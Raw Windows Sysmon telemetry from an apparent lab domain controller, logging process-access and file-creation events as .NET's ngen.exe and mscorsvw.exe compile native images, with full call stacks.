13:48:12.326{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919C-6005-DB02-00000000A301}2708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.295{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919C-6005-DA02-00000000A301}2872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.279{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-919C-6005-DA02-00000000A301}2872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.279{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919C-6005-DA02-00000000A301}2872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:12.217{59A5CD1D-919C-6005-D902-00000000A301}2832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b10-0\System.Windows.Forms.DataVisualization.Design.dll2021-01-18 13:48:12.217 10341000x80000000000000007083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.061{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919C-6005-D902-00000000A301}2832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.045{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-919C-6005-D902-00000000A301}2832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:12.045{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919C-6005-D902-00000000A301}2832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:11.998{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919C-6005-D802-00000000A301}4140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:11.998{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-919C-6005-D802-00000000A301}4140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:11.998{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919C-6005-D802-00000000A301}4140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:13.060{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919D-6005-DF02-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:13.045{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-919D-6005-DF02-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:13.045{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919D-6005-DF02-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:15.264{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919F-6005-E102-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:15.248{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-919F-6005-E102-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:15.248{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919F-6005-E102-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:15.170{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919F-6005-E002-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:15.154{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-919F-6005-E002-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:15.154{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919F-6005-E002-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:15.029{59A5CD1D-919D-6005-DF02-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1320-0\System.Workflow.Activities.dll2021-01-18 13:48:15.029 10341000x80000000000000007118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:18.560{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A2-6005-E302-00000000A301}860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:18.545{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A2-6005-E302-00000000A301}860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:18.545{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A2-6005-E302-00000000A301}860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:18.467{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A2-6005-E202-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:18.467{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A2-6005-E202-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:18.467{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A2-6005-E202-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C